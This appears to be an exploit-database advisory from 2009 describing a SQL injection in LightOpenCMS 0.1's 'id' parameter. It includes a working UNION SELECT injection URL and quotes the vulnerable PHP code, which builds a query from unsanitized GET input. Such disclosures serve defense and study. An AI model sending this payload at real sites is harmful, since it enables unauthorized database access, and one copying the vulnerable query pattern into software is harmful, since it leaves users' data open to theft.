Lucene search

K
exploitdbMi4nightEDB-ID:8724
HistoryMay 18, 2009 - 12:00 a.m.

LightOpenCMS 0.1 - 'id' SQL Injection

2009-05-1800:00:00
Mi4night
www.exploit-db.com
26

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

54.4%

[+] LightOpenCMS (id) SQL Injection Vulnerability

[+] Author: Mi4night

[+] Script: http://sourceforge.net/project/downloading.php?group_id=251474&filename=locms-0.1-pa.zip&a=4814604

[+] Injection:

http://127.0.0.1/[path]/index.php?id=-1%27%20union%20select%201,2,@@version,4%20%23

[+] Requires: magic_gpc() == OFF

[+] Vulnerable code:
if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");

[+] Patch:
Its fucking beta.. or alpha or whatever. they'll fix it in the stable version !


[+] Shoutz to: Nuc my brotha, str0ke and all the otherz i forgot xD

# milw0rm.com [2009-05-18]

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

54.4%

Related for EDB-ID:8724